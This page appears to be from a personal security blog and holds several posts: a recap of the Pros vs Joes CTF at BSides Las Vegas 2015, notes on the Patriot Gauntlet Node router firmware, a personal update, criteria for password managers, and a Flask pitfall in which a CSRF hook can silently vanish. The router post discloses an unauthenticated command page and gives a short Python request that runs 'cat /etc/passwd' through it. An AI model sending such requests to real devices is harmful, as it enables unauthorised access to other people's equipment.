System Overlord

A blog about security engineering, research, and general hacking.

Hacker Summer Camp 2015: BSides LV & Pros vs Joes CTF

I’ve just returned from Las Vegas for the annual “hacker summer camp”, and am going to be putting up a series of blog posts covering the week. Tuesday and Wednesday were BSides Las Vegas. For the uninitiated, BSides was founded as the “flip side” to Black Hat, and has since spawned a series of community-organized, community-oriented conferences around the globe. Entrance to BSides LV was free, but you could guarantee a spot by donating in advance if you were so inclined. (I was.)

As regular readers know, I play a little bit of CTF (Capture the Flag), and BSides LV is home to one of the most unique CTF competitions I’ve ever played in: the “Pros vs Joes” CTF run by dichotomy. This CTF pits multiple defending teams (Blue Cells), each consisting of Joes plus one Pro Captain, against a “Red Cell” of professional penetration testers. Even though I work in security, my focus is on Application Security rather than Network Security (which PvJ heavily emphasizes), so I’ve never felt comfortable playing as a pro. Consequently, this was my 3rd year as a “Joe” in the PvJ CTF. (Maybe one day I’ll make it past my Impostor Syndrome.)

If you’re not familiar with this CTF, here’s the rundown: on the first day, each blue cell defends its network against attack by the red cell; for the blue cells, the first day is entirely defense. On the second day, the red cell is “dissolved” into the blue cells: each blue cell gains two new pros and it becomes blue cell vs. blue cell, so every team has to take on the role of both attacker and defender. It’s great fun and requires a ton of work to set up, so my hat goes off to dichotomy for organizing and running it all.

Though I’ve played in the past, this year brought new challenges and experiences. Firstly, there was significant integration between the CTF and the Social Engineering CTF. (Apparently even more than I realized while playing.) This brought interesting components, such as people trying to social engineer information out of us or get us to help them with tasks for the SECTF, but it also brought challenges, the most significant of which was people who joined the CTF solely to gain information to help them with the SECTF. It’s my hope that next year, team captains will be allowed to “fire” team members who are obviously attempting to “leak” information.

There were other changes as well. In the past, there were two blue cells and one red cell; this year, dichotomy managed to up it to a whopping four blue cells! That brought us to a total of 44 players, which was obviously no small feat for both dichotomy and the conference organizers. There was also a greater emphasis on the use of “tickets” in the scoring system. Now, I’m not a fan of the tickets myself: most of them consist of boring inventory or asset-management work, and it’s often not clear exactly what response is expected. Hopefully this is the sort of thing that will be tweaked by next year. (As it was, the scoring tweaks dichotomy made to the ticket system between the first and second day were a welcome improvement.)

By far, however, the most interesting change to me was obvious even upon walking in the room. As soon as I saw the tables, I noticed something new: SIP phones on each table. Yes, they were connected. To a PBX. That was in scope. And had default credentials. That was definitely new – and not something most of the teams picked up on.

All things considered, I feel that my team (“Endtroducing”) did pretty well with a 2nd place finish. The first place team just seemed unbeatable. I don’t know if it was a different ratio of attack/defense, luck, different skills or what, but it worked out well for them.

In the next week or so, I’ll be writing a blue team player’s guide based on my 3 years of experience. It’ll expose some things about the play environment that have been constant for the 3 years, some tactics I’ve used, and just some general guidance on preparing for the Pros vs Joes CTF.


Playing with the Patriot Gauntlet Node (Part 2)

It’s been over two years since I posted Part 1, but I got bored and decided I should take another look at the Patriot Gauntlet Node. So I grabbed the latest firmware from Patriot’s website (V21_1.2.4.6) and, using the same binwalk techniques described in the first post, extracted it.
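
(For anyone following along, the extraction step is roughly the following; the firmware filename here is hypothetical, so use whatever Patriot’s download is actually called.)

#!python
import subprocess

# Hypothetical filename for the V21_1.2.4.6 download; 'binwalk -e' carves out
# anything it recognizes into a _<filename>.extracted directory.
subprocess.run(["binwalk", "-e", "GAUNTLET_V21_1.2.4.6.bin"], check=True)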

So, the TL;DR is: It’s unexciting because Patriot makes no effort to secure the device. It seems that their security model is “if you’re on the network, you own the device”, which is pretty much the case. Not only can you enable telnet as I’ve discussed before, there’s even a convenient web-based interface to run commands: http://10.10.10.254:8088/adm/system_command.asp. Oh, and it’s not authenticated. Even if you set an admin password (which is hidden at http://10.10.10.254:8088/adm/management.asp).
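
To give a sense of just how open that is, something like the following sketch should run a command on the device. I haven’t re-verified the details, so treat the form field name (`command`) and the idea that the page posts back to itself as assumptions; check the page’s HTML for the real field and form action.

#!python
import requests

# Assumption: the stock system_command.asp form posts a field named 'command'
# back to the device, which runs it with no authentication and returns output.
resp = requests.post(
    "http://10.10.10.254:8088/adm/system_command.asp",
    data={"command": "cat /etc/passwd"},
)
print(resp.text)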

The device runs two webservers: on port 80 you have httpd from BusyBox, and on port 8088 you have a proprietary embedded webserver called GoAhead. The latter doesn’t actually use ASP, as the file extensions would have you believe, but an embedded JavaScript interpreter called Ejscript to generate its active pages.

I don’t intend to spend much more time on this device from a security PoV: it doesn’t seem intended to be secure at all, so it’s not like there’s anything to break. The device is essentially pre-rooted, so go to town and have fun!


Lack of Updates, Turning 30

I’ve been disappointed with myself for a while for not updating more often. It’s been months! I’d been pushing myself to update regularly, but I also only want to update with genuine content. Social networks are places where I can drop random thoughts; this is a place for meaningful content that will (hopefully) be useful to others. (Though the jury’s still out on that one.)

Part of the reason for the lack of updates is burnout. For one reason or another, I just haven’t been feeling myself for a while, and so haven’t been doing as many interesting things. Some of this burnout is due to the nature of things I’ve been doing at work, but it wouldn’t be fair to blame all of it on work.

I’ve also been dealing with some (potential) health issues. Mostly it’s been a case of symptoms with no obvious cause, which is even more maddening to me. Despite reassurances from doctors, I can’t help but have a nagging feeling that something is actually wrong. It’s quite the distraction, psychologically.

So, in more timely news, I’ve made the transition from my 20s to my 30s (two weeks ago). When I was 25, I posted asking if 25 was old, because I felt like I hadn’t accomplished anything. Though I think I’ve accomplished a few things in the intervening time, I’m not convinced it was five quality years’ worth. I need to get better at prioritizing and making sure I spend my time in good ways. I’d like to make sure I’m either doing something I enjoy, something meaningful, or something helpful to others. Anything else is just a waste of precious time.


Towards a Better Password Manager

The consensus in the security community is that passwords suck, but they’re here to stay, at least for a while longer. Given breaches like Adobe, …, it’s becoming more and more evident that the biggest threat is not weak passwords, but password reuse. Of course, the solution to password reuse is to use a different password for every site that requires you to log in. The problem is that your average user has dozens of online accounts, and they probably can’t remember dozens of passwords. So we build tools to help people remember passwords, mostly password managers, but do we build them well?

I don’t think so. But before I look at the password managers that are out there, it’s important to define the criteria that a good password manager would meet.

  1. Use well-understood encryption to protect the data. A good password manager should use cryptographic constructions that are well understood and reviewed. Ideally, it would build upon existing cryptographic libraries or full cryptosystems. This includes the KDF (key-derivation function) as well as the encryption of the data itself. Oh, and all of the data should be encrypted, not just the passwords. (A minimal sketch of what this might look like follows this list.)

  2. The source should be auditable. No binaries, no compressed/minified JavaScript. If built in a compiled language, it should have source available with verifiable builds. If built in an interpreted language, the source should be unobfuscated and readable. Not everyone will audit their password manager, but it should be possible.

  3. The file format should be open. The data should be stored in an open, documented format, allowing for interoperability. Your passwords should not be tied to a particular manager, whether that’s because the developer of that manager abandoned it, or because it’s not supported on a particular platform, or because you like a blue background instead of grey.

  4. It should integrate with the browser. Yes, there are some concerns about exposing the password manager within the browser, but it’s more important that this be highly usable. That includes making it easy to generate passwords, easy to fill passwords, and most importantly: harder to phish. In-browser password managers can compare the origin of the page you’re on to the data stored, so users are less likely to enter their password in the wrong page. With a separate password manager, users generally copy/paste their passwords into a login page, which relies on the user to ensure they’re putting their password into the right site.

  5. Sync, if offered, should be independent of encryption. Your encryption passphrase should not be used for sync. In fact, your encryption passphrase should never be sent to the provider: not at signup, not at login, not ever. Sync, unfortunately, only sounds simple: drop a file in Dropbox or Google Drive, right? But what happens if the file gets updated while the password manager is open? How do changes get synced if two clients are open?
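
To make the first criterion concrete, here’s a minimal sketch (not a finished design) of what “well-understood encryption” might look like in Python using the cryptography package: a memory-hard KDF turns the passphrase into a key, and an AEAD cipher covers the entire serialized vault, not just the passwords. The parameters and storage layout are illustrative assumptions.

#!python
import json
import os

from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt


def encrypt_vault(passphrase: bytes, vault: dict) -> bytes:
    """Encrypt the whole vault (sites, usernames, notes, and passwords)."""
    salt = os.urandom(16)
    key = Scrypt(salt=salt, length=32, n=2**15, r=8, p=1).derive(passphrase)
    nonce = os.urandom(12)
    ciphertext = AESGCM(key).encrypt(nonce, json.dumps(vault).encode(), None)
    # The salt and nonce are not secret; store them alongside the ciphertext.
    return salt + nonce + ciphertext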

These are just the five most important features as I see them, and not a comprehensive design document for password managers. I’ve yet to find a manager that meets all of these criteria, but I’m hoping we’re moving in this direction.


Dangers of decorator-based registries in Python

So Flask has a really convenient mechanism for registering handlers, actions to be run before/after requests, etc. Using decorators, Flask registers these functions to be called, as in:

#!python
from flask import Flask

app = Flask(__name__)

@app.route('/')
def homepage_handler():
    return 'Hello World'

@app.before_request
def do_something_before_each_request():
    ...

This is pretty convenient, and works really well, because it means you don’t have to list all your routes in one place (like Django requires), but it comes with a cost: you can end up with Python modules that are needed only for the side effects of importing them. No functions from those modules are directly called from your other modules, but they still need to be imported somewhere to get the routes registered.

Of course, if you import a module just for its side effects, pylint won’t be aware you need the import, and will helpfully suggest that you remove it. This generally isn’t too bad for views: if you drop the import of a module with views defined in it, those routes just stop working, you notice quickly, and you re-add the import.

On the other hand, if the import you’re dropping is a before_request function that, say, provides CSRF protection, then you have a serious problem: the protection silently disappears. Of course, that’s the case I found myself in. So you’ll want to make sure that doesn’t occur: either use a resource from the module directly, so the import is clearly needed, or tell pylint that the import is intentional.
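
Concretely, the latter option looks something like this; the module names are made up for illustration:

#!python
# app_setup.py (hypothetical): these imports exist purely for their side
# effects, i.e. importing the modules registers their routes and
# before_request hooks with the Flask app. The pragma tells pylint the
# "unused" import is intentional.
import myapp.views  # pylint: disable=unused-import
import myapp.csrf   # pylint: disable=unused-import

The alternative is to have each module export something (a blueprint, for instance) that the importing module actually uses, so the dependency is visible to both humans and linters.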